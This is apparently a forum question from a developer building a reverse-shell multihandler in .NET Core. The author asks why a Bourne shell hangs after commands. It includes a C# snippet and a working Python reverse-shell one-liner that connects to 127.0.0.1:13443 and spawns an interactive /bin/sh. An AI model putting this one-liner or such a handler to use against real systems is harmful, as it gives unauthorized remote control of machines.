This may end up being a confusing question if you don't understand reverse shells but the tldr; is I'm trying to write a shell multihandler in .NET Core.
I have it handling bash, cmd, and powershell, shells just fine. However, when I try and handle a bourne shell, it connects just fine, but the shell seems to hang when I send it commands.
I believe the issue is not properly terminating the command with the right hex
Just for the POC this code splits out the Bourne Shell
if (ShellOsType == OsType.Linux && Prompt.Trim() == "$")
{
writer.Write(command + "\n");
}
else
writer.WriteLine(command); //if I use WriteLine for the bourne shell, the shell throws an error : not found
}python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",13443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'whoami\n
I'm expecting 2 lines in return
myusername
$
but I'm only getting one line in response
myusername
And if I go to where I created my reverse shell and hit CTRL+C it doesn't kill my shell but it does force it to send the second line to my handler.
**What have I tried?**
I've tried opening an ascii hex table and using everything up to the letters both before and after the \n in case I was missing something and nothing works but it does make it worse in some cases
Asked by DotNetRussell
(329 rep)
Jul 14, 2024, 07:18 PM
Last activity: Jul 14, 2024, 07:51 PM
Last activity: Jul 14, 2024, 07:51 PM